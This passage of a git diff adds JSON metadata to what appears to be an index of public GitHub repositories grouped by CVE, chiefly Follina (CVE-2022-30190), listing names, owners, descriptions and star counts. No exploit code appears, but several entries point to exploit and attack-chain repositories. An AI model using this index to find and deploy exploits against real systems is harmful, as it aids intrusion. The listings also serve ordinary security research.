"Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-2992", + "description": "Authenticated Remote Command Execution in Gitlab via GitHub import.", + "fork": false, + "created_at": "2022-10-14T20:47:51Z", + "updated_at": "2023-05-06T12:14:57Z", + "pushed_at": "2022-10-14T20:49:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated", + "cve-2022-2992", + "exploit", + "github", + "github-importer", + "gitlab", + "remote-command-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30075.json b/2022/CVE-2022-30075.json index b48c5c9b39..3bdee4f8e1 100644 --- a/2022/CVE-2022-30075.json +++ b/2022/CVE-2022-30075.json @@ -60,5 +60,36 @@ "watchers": 2, "score": 0, "subscribers_count": 1 + }, + { + "id": 535555864, + "name": "CVE-2022-30075", + "full_name": "M4fiaB0y\/CVE-2022-30075", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-30075", + "description": null, + "fork": false, + "created_at": "2022-09-12T07:28:13Z", + "updated_at": "2022-09-13T01:15:44Z", + "pushed_at": "2022-09-12T07:28:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-30114.json b/2022/CVE-2022-30114.json new file mode 100644 index 0000000000..6cec39442b --- /dev/null +++ b/2022/CVE-2022-30114.json @@ -0,0 +1,33 @@ +[ + { + "id": 637148341, + "name": "CVE-2022-30114", + "full_name": "str0ng4le\/CVE-2022-30114", + "owner": { + "login": "str0ng4le", + "id": 83457499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83457499?v=4", + "html_url": "https:\/\/github.com\/str0ng4le", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/str0ng4le\/CVE-2022-30114", + "description": null, + "fork": false, + "created_at": "2023-05-06T16:51:30Z", + "updated_at": "2023-05-11T08:42:56Z", + "pushed_at": "2023-05-12T21:57:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30129.json b/2022/CVE-2022-30129.json new file mode 100644 index 0000000000..559d467ddc --- /dev/null +++ b/2022/CVE-2022-30129.json @@ -0,0 +1,33 @@ +[ + { + "id": 575523031, + "name": "CVE-2022-30129", + "full_name": "RoccoPearce\/CVE-2022-30129", + "owner": { + "login": "RoccoPearce", + "id": 59900894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59900894?v=4", + "html_url": "https:\/\/github.com\/RoccoPearce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RoccoPearce\/CVE-2022-30129", + "description": null, + "fork": false, + "created_at": "2022-12-07T17:46:14Z", + "updated_at": "2023-02-09T18:12:19Z", + "pushed_at": "2022-12-07T19:21:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30136.json b/2022/CVE-2022-30136.json new file mode 100644 index 0000000000..8a11e90d94 --- /dev/null +++ b/2022/CVE-2022-30136.json @@ -0,0 +1,64 @@ +[ + { + "id": 614321236, + "name": "CVE-2022-30136", + "full_name": "fortra\/CVE-2022-30136", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2022-30136", + "description": "Windows Network File System Remote exploit for CVE-2022-30136", + "fork": false, + "created_at": "2023-03-15T10:59:08Z", + "updated_at": "2024-12-09T01:45:02Z", + "pushed_at": "2023-07-11T16:57:26Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 657715461, + "name": "CVE-2022-30136", + "full_name": "AXRoux\/CVE-2022-30136", + "owner": { + "login": "AXRoux", + "id": 103153079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103153079?v=4", + "html_url": "https:\/\/github.com\/AXRoux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AXRoux\/CVE-2022-30136", + "description": "Windows Network File System Remote exploit (DoS) PoC", + "fork": false, + "created_at": "2023-06-23T17:13:22Z", + "updated_at": "2023-06-26T07:07:36Z", + "pushed_at": "2023-06-23T17:14:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30190.json b/2022/CVE-2022-30190.json index 8bbdb47f75..9269c0926c 100644 --- a/2022/CVE-2022-30190.json +++ b/2022/CVE-2022-30190.json @@ -2148,5 +2148,569 @@ "watchers": 8, "score": 0, "subscribers_count": 1 + }, + { + "id": 516257756, + "name": "Follina-MSDT-Vulnerability-CVE-2022-30190-", + "full_name": "EkamSinghWalia\/Follina-MSDT-Vulnerability-CVE-2022-30190-", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Follina-MSDT-Vulnerability-CVE-2022-30190-", + "description": "Detection and Remediation of the Follina MSDT Vulnerability (CVE-2022-30190)", + "fork": false, + "created_at": "2022-07-21T06:49:44Z", + "updated_at": "2024-07-04T03:35:20Z", + "pushed_at": "2022-07-22T15:00:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520189959, + "name": "five-nights-at-follina-s", + "full_name": "jeffreybxu\/five-nights-at-follina-s", + "owner": { + "login": "jeffreybxu", + "id": 19352690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19352690?v=4", + "html_url": "https:\/\/github.com\/jeffreybxu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffreybxu\/five-nights-at-follina-s", + "description": "A Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.", + "fork": false, + "created_at": "2022-08-01T16:47:50Z", + "updated_at": "2024-09-10T23:02:11Z", + "pushed_at": "2022-08-05T16:16:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 525371313, + "name": "Follina-CVE-2022-30190-PoC-sample", + "full_name": "Captain404\/Follina-CVE-2022-30190-PoC-sample", + "owner": { + "login": "Captain404", + "id": 58698256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58698256?v=4", + "html_url": "https:\/\/github.com\/Captain404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Captain404\/Follina-CVE-2022-30190-PoC-sample", + "description": "Educational Follina PoC Tool", + "fork": false, + "created_at": "2022-08-16T12:32:33Z", + "updated_at": "2022-08-16T12:34:43Z", + "pushed_at": "2022-08-16T12:48:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 537107690, + "name": "CVE-2022-30190", + "full_name": "winstxnhdw\/CVE-2022-30190", + "owner": { + "login": "winstxnhdw", + "id": 56998716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56998716?v=4", + "html_url": "https:\/\/github.com\/winstxnhdw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/winstxnhdw\/CVE-2022-30190", + "description": "A proof of concept for CVE-2022-30190 (Follina).", + "fork": false, + "created_at": "2022-09-15T16:12:57Z", + "updated_at": "2023-08-29T16:29:42Z", + "pushed_at": "2024-03-01T16:26:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40444", + "follina", + "msdt", + "remote-code-execution", + "trojan" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 546628423, + "name": "Follina-attack-CVE-2022-30190-", + "full_name": "Imeneallouche\/Follina-attack-CVE-2022-30190-", + "owner": { + "login": "Imeneallouche", + "id": 89279264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89279264?v=4", + "html_url": "https:\/\/github.com\/Imeneallouche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Imeneallouche\/Follina-attack-CVE-2022-30190-", + "description": "this is a demo attack of FOLLINA exploit , a vulnerability that has been discovered in May 2022 and stood unpatched until June 2022", + "fork": false, + "created_at": "2022-10-06T11:41:43Z", + "updated_at": "2022-10-06T15:42:31Z", + "pushed_at": "2022-10-06T21:22:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564441217, + "name": "CVE-Smackdown", + "full_name": "mattjmillner\/CVE-Smackdown", + "owner": { + "login": "mattjmillner", + "id": 56142300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56142300?v=4", + "html_url": "https:\/\/github.com\/mattjmillner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mattjmillner\/CVE-Smackdown", + "description": "Implementation of CVE-2022-30190 in C", + "fork": false, + "created_at": "2022-11-10T18:15:57Z", + "updated_at": "2022-11-10T18:15:57Z", + "pushed_at": "2022-11-10T18:59:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568186569, + "name": "FollinaXploit", + "full_name": "0xAbbarhSF\/FollinaXploit", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/FollinaXploit", + "description": "A Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.", + "fork": false, + "created_at": "2022-11-19T18:09:47Z", + "updated_at": "2025-01-04T18:22:36Z", + "pushed_at": "2022-11-19T18:41:57Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582283998, + "name": "Cve-2022-30190", + "full_name": "michealadams30\/Cve-2022-30190", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/Cve-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-12-26T10:29:46Z", + "updated_at": "2023-07-26T14:55:23Z", + "pushed_at": "2022-12-26T10:32:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 583330434, + "name": "Enterprise-Cybersecurity", + "full_name": "melting0256\/Enterprise-Cybersecurity", + "owner": { + "login": "melting0256", + "id": 103974176, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103974176?v=4", + "html_url": "https:\/\/github.com\/melting0256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/melting0256\/Enterprise-Cybersecurity", + "description": "CVE-2022-30190(follina)", + "fork": false, + "created_at": "2022-12-29T13:06:16Z", + "updated_at": "2023-07-26T14:55:21Z", + "pushed_at": "2022-12-29T13:08:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 601379517, + "name": "CVE-2022-30190", + "full_name": "yrkuo\/CVE-2022-30190", + "owner": { + "login": "yrkuo", + "id": 39819798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39819798?v=4", + "html_url": "https:\/\/github.com\/yrkuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yrkuo\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2023-02-13T23:58:58Z", + "updated_at": "2023-12-25T12:02:49Z", + "pushed_at": "2023-02-14T01:29:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 613736106, + "name": "FOLLINA-CVE-2022-30190", + "full_name": "ToxicEnvelope\/FOLLINA-CVE-2022-30190", + "owner": { + "login": "ToxicEnvelope", + "id": 23465872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23465872?v=4", + "html_url": "https:\/\/github.com\/ToxicEnvelope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ToxicEnvelope\/FOLLINA-CVE-2022-30190", + "description": "Implementation of FOLLINA-CVE-2022-30190", + "fork": false, + "created_at": "2023-03-14T07:00:47Z", + "updated_at": "2024-06-20T18:44:33Z", + "pushed_at": "2023-08-27T09:39:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 635211834, + "name": "CVE-2022-30190", + "full_name": "hycheng15\/CVE-2022-30190", + "owner": { + "login": "hycheng15", + "id": 74200918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74200918?v=4", + "html_url": "https:\/\/github.com\/hycheng15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hycheng15\/CVE-2022-30190", + "description": "An exploitation of CVE-2022-30190 (Follina)", + "fork": false, + "created_at": "2023-05-02T07:56:28Z", + "updated_at": "2023-07-26T14:55:29Z", + "pushed_at": "2023-11-14T10:19:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640555631, + "name": "CVE-2022-30190", + "full_name": "aminetitrofine\/CVE-2022-30190", + "owner": { + "login": "aminetitrofine", + "id": 70074517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4", + "html_url": "https:\/\/github.com\/aminetitrofine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-30190", + "description": "Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks.", + "fork": false, + "created_at": "2023-05-14T13:38:43Z", + "updated_at": "2025-01-05T21:18:32Z", + "pushed_at": "2023-05-14T13:45:18Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667473352, + "name": "Follina_MSDT_CVE-2022-30190", + "full_name": "Muhammad-Ali007\/Follina_MSDT_CVE-2022-30190", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Follina_MSDT_CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2023-07-17T15:24:54Z", + "updated_at": "2024-04-20T01:38:09Z", + "pushed_at": "2023-07-18T20:13:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 724428602, + "name": "AmzWord", + "full_name": "Jump-Wang-111\/AmzWord", + "owner": { + "login": "Jump-Wang-111", + "id": 69379868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69379868?v=4", + "html_url": "https:\/\/github.com\/Jump-Wang-111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jump-Wang-111\/AmzWord", + "description": "An automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography.", + "fork": false, + "created_at": "2023-11-28T03:47:32Z", + "updated_at": "2024-09-04T02:59:22Z", + "pushed_at": "2023-11-28T10:16:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758899750, + "name": "ZipScan", + "full_name": "shri142\/ZipScan", + "owner": { + "login": "shri142", + "id": 81535914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81535914?v=4", + "html_url": "https:\/\/github.com\/shri142", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shri142\/ZipScan", + "description": "A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)", + "fork": false, + "created_at": "2024-02-17T12:10:12Z", + "updated_at": "2024-02-24T17:59:28Z", + "pushed_at": "2024-02-24T17:59:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784462275, + "name": "CVE-2022-30190", + "full_name": "alien-keric\/CVE-2022-30190", + "owner": { + "login": "alien-keric", + "id": 102582785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102582785?v=4", + "html_url": "https:\/\/github.com\/alien-keric", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alien-keric\/CVE-2022-30190", + "description": "The script is from https:\/\/github.com\/JohnHammond\/msdt-follina, just make it simple for me to use it and this script aim at generating the payload for more information refer the johnn hammond link", + "fork": false, + "created_at": "2024-04-09T22:40:09Z", + "updated_at": "2024-04-10T01:26:23Z", + "pushed_at": "2024-04-09T22:41:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831490675, + "name": "Follina-CVE-2022-30190-Sample", + "full_name": "ethicalblue\/Follina-CVE-2022-30190-Sample", + "owner": { + "login": "ethicalblue", + "id": 82314652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82314652?v=4", + "html_url": "https:\/\/github.com\/ethicalblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethicalblue\/Follina-CVE-2022-30190-Sample", + "description": "Educational exploit for CVE-2022-30190", + "fork": false, + "created_at": "2024-07-20T17:50:48Z", + "updated_at": "2024-07-20T19:56:33Z", + "pushed_at": "2024-07-20T18:23:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-30203.json b/2022/CVE-2022-30203.json new file mode 100644 index 0000000000..3a6d1c4eb5 --- /dev/null +++ b/2022/CVE-2022-30203.json @@ -0,0 +1,44 @@ +[ + { + "id": 811928581, + "name": "dubiousdisk", + "full_name": "Wack0\/dubiousdisk", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/dubiousdisk", + "description": "The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)", + "fork": false, + "created_at": "2024-06-07T15:25:33Z", + "updated_at": "2024-10-09T02:12:28Z", + "pushed_at": "2024-06-07T15:26:02Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitlocker", + "cve-2022-30203", + "cve-2023-21560", + "cve-2023-28249", + "cve-2023-28269", + "secure-boot", + "uefi", + "vulnerability", + "windows-boot", + "writeup" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30206.json b/2022/CVE-2022-30206.json new file mode 100644 index 0000000000..837873b412 --- /dev/null +++ b/2022/CVE-2022-30206.json @@ -0,0 +1,73 @@ +[ + { + "id": 535010646, + "name": "CVE-2022-30206", + "full_name": "MagicPwnrin\/CVE-2022-30206", + "owner": { + "login": "MagicPwnrin", + "id": 98268685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98268685?v=4", + "html_url": "https:\/\/github.com\/MagicPwnrin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagicPwnrin\/CVE-2022-30206", + "description": "Exploit for CVE-2022-30206", + "fork": false, + "created_at": "2022-09-10T13:44:40Z", + "updated_at": "2024-08-12T20:26:54Z", + "pushed_at": "2022-09-25T12:36:09Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 75, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 541754624, + "name": "CVE-2022-30206", + "full_name": "Malwareman007\/CVE-2022-30206", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-30206", + "description": "A POC of CVE-2022-30206", + "fork": false, + "created_at": "2022-09-26T19:38:24Z", + "updated_at": "2024-08-12T20:27:21Z", + "pushed_at": "2022-09-26T19:42:57Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-30206", + "microsoft", + "print-spooler", + "privileges", + "security", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 1, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30216.json b/2022/CVE-2022-30216.json new file mode 100644 index 0000000000..93943bf8ec --- /dev/null +++ b/2022/CVE-2022-30216.json @@ -0,0 +1,33 @@ +[ + { + "id": 513217739, + "name": "CVE-2022-30216", + "full_name": "corelight\/CVE-2022-30216", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-30216", + "description": "Zeek detection logic for CVE-2022-30216.", + "fork": false, + "created_at": "2022-07-12T16:35:37Z", + "updated_at": "2024-08-12T20:25:01Z", + "pushed_at": "2023-04-04T20:11:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30333.json b/2022/CVE-2022-30333.json new file mode 100644 index 0000000000..2a9fc85b94 --- /dev/null +++ b/2022/CVE-2022-30333.json @@ -0,0 +1,157 @@ +[ + { + "id": 510563141, + "name": "CVE-2022-30333-PoC", + "full_name": "TheL1ghtVn\/CVE-2022-30333-PoC", + "owner": { + "login": "TheL1ghtVn", + "id": 89027345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89027345?v=4", + "html_url": "https:\/\/github.com\/TheL1ghtVn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheL1ghtVn\/CVE-2022-30333-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-05T02:35:12Z", + "updated_at": "2023-07-06T12:20:38Z", + "pushed_at": "2022-07-05T02:58:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514420724, + "name": "unrar-cve-2022-30333-poc", + "full_name": "rbowes-r7\/unrar-cve-2022-30333-poc", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/unrar-cve-2022-30333-poc", + "description": null, + "fork": false, + "created_at": "2022-07-15T22:29:42Z", + "updated_at": "2024-08-12T20:25:08Z", + "pushed_at": "2022-07-18T16:16:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 516568409, + "name": "CVE-2022-30333", + "full_name": "J0hnbX\/CVE-2022-30333", + "owner": { + "login": "J0hnbX", + "id": 98451016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98451016?v=4", + "html_url": "https:\/\/github.com\/J0hnbX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J0hnbX\/CVE-2022-30333", + "description": null, + "fork": false, + "created_at": "2022-07-22T01:14:29Z", + "updated_at": "2022-10-26T01:11:38Z", + "pushed_at": "2022-07-22T01:14:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518072916, + "name": "Zimbra-CVE-2022-30333", + "full_name": "aslitsecurity\/Zimbra-CVE-2022-30333", + "owner": { + "login": "aslitsecurity", + "id": 9478055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478055?v=4", + "html_url": "https:\/\/github.com\/aslitsecurity", + "user_view_type": "public" + }, + "html_url": 